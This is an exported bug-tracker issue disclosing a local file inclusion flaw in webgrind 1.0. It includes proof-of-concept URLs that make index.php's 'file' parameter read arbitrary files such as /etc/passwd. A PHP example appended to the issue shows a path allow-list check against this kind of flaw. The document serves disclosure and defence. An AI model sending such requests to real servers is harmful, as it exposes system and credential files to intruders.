woodtime / webgrind

Automatically exported from code.google.com/p/webgrind

webgrind 1.0 (trunk 1.02) Local File Inclusion (LFI) Vulnerability #66

Open GoogleCodeExporter opened 8 years ago

GoogleCodeExporter commented 8 years ago
index.php, param: file

The lfitest.txt is located in C:\ (c:\lfitext.txt), you can replace it with boot.ini for example.

- http://localhost/webgrind/index.php?file=/lfitest.txt&op=fileviewer
- http://localhost/webgrind/index.php?file=/etc/passwd&op=fileviewer

2. Tested on current version of WampServer version 2.2c (win32) and Fedora Linux.
3. Webgrind version 1.0 (trunk v1.02 (github))

Thank You,

Gjoko,
lab@zeroscience.mk

Original issue reported on code.google.com by liquidw...@gmail.com on 22 Feb 2012 at 3:22
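
One way to constrain a file-viewer parameter like the `file` value in this report, as an added PHP example that is not webgrind's code or its actual fix. The helper name `resolve_viewable_file`, the allow-listed directory and the demo files are assumptions constructed for illustration.

```php
<?php
// Added example: hypothetical helper, not webgrind's code or its fix.
// Accept a user-supplied path only when its canonical form lies inside
// a directory the file viewer is meant to read.
function resolve_viewable_file(string $requested, array $allowedRoots): ?string
{
    // Empty values and NUL bytes are never valid file names.
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    // realpath() collapses "..", follows symlinks, and fails on missing paths.
    $real = realpath($requested);
    if ($real === false || !is_file($real)) {
        return null;
    }
    foreach ($allowedRoots as $root) {
        $rootReal = realpath($root);
        if ($rootReal === false) {
            continue;
        }
        // Trailing separator so "/srv/app" does not match "/srv/app-secret".
        $prefix = rtrim($rootReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
        if (strncmp($real, $prefix, strlen($prefix)) === 0) {
            return $real;
        }
    }
    return null;
}

// Constructed demo: a temporary directory stands in for the profiled sources.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'viewer_demo_' . getmypid();
mkdir($root);
file_put_contents($root . DIRECTORY_SEPARATOR . 'profiled.php', "<?php echo 1;\n");

$candidates = [
    $root . '/profiled.php',          // inside the allowed root
    $root . '/./profiled.php',        // same file, non-canonical spelling
    '/lfitest.txt',                   // values from the report's URLs
    '/etc/passwd',
    $root . '/../../etc/passwd',      // non-canonical path leaving the root
];
foreach ($candidates as $candidate) {
    $ok = resolve_viewable_file($candidate, [$root]) !== null;
    printf("%-8s %s\n", $ok ? 'allowed' : 'rejected', $candidate);
}

unlink($root . DIRECTORY_SEPARATOR . 'profiled.php');
rmdir($root);
```

The comparison is made on the canonical path rather than the raw parameter, so only files under the allow-listed directory are returned to the viewer.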